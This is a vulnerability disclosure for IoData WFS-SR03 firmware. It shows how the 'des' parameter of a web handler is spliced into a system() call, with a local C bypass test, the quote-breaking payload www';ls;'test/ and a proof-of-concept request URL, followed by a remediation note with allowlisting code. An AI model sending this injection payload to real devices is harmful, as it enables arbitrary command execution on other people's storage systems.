IoData:WFS-SR03 v1.0.3(2022/11/14)
https://www.iodata.jp/lib/software/w/2176.htm
The des parameter of the pro_stor_canceltrans_handler_part_19 function in IOS is user-controllable, resulting in arbitrary command injection.
The variable v2 is first obtained from the des parameter of the HTTP request (user controllable). The code then checks whether v2 ends with '/'
and returns its length in v8. As the figure below shows, the loop only checks for the trailing '/'
and then copies the string into a1, so a string of the form id | www/ is enough
to bypass this check.
At this point the code calls sprintf(v7, "%s '%s'", "stopcp", v8);
so the single-quote restriction also needs to be bypassed.
Local bypass test:
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <string.h>
int main(void)
{
char v7[2048];
/* the closing quote of the original format is consumed by the payload's own quotes */
char *v8 = "www';ls;'test/";
sprintf(v7, "%s '%s'", "stopcp", v8);   /* same format string as the firmware */
system(v7);
return 0;
}
Successfully bypassed!
So the final payload is www';ls;'test/
which is passed to system() and executed.
ls can be replaced
with an arbitrary command.
PoC:
<http://127.0.0.1/protocol.csp?fname=system&opt=canceltrans&src=test&des=www';ls;'test/&function=set>
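Added note, not part of the original write-up: the root cause is that a request parameter is spliced into a shell command string, so wrapping it in single quotes cannot contain it. A hypothetical hardened handler (not IoData's code) would allowlist the characters of des and pass the value as one argv element to execvp/posix_spawn instead of building a string for system():

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical check for a path-like request parameter such as des.
 * Accepts only [A-Za-z0-9._/-], rejects empty or oversized input and ".."
 * segments; quotes, ';', '|', '&', '$', '`', spaces and newlines all fail. */
bool des_param_is_safe(const char *des)
{
    if (des == NULL || des[0] == '\0' || strlen(des) >= 1024)
        return false;
    if (strstr(des, "..") != NULL)
        return false;
    for (const unsigned char *p = (const unsigned char *)des; *p; p++) {
        if (isalnum(*p) || *p == '/' || *p == '.' || *p == '_' || *p == '-')
            continue;
        return false;
    }
    return true;
}

/* Build the argument vector for "stopcp <des>" without a shell: the value is
 * a single argv element, so shell metacharacters cannot split the command.
 * Returns the number of arguments written, or -1 if des is rejected. */
int build_stopcp_argv(const char *des, const char *argv[], int argv_len)
{
    if (argv_len < 3 || !des_param_is_safe(des))
        return -1;
    argv[0] = "stopcp";
    argv[1] = des;      /* no quoting needed, nothing interprets it */
    argv[2] = NULL;     /* ready for execvp()/posix_spawn() */
    return 2;
}

int main(void)
{
    const char *argv[3];
    const char *samples[] = { "www/", "www';ls;'test/", "../etc/" };
    for (int i = 0; i < 3; i++)
        printf("%-16s -> %s\n", samples[i],
               build_stopcp_argv(samples[i], argv, 3) < 0 ? "rejected" : "accepted");
    return 0;
}
```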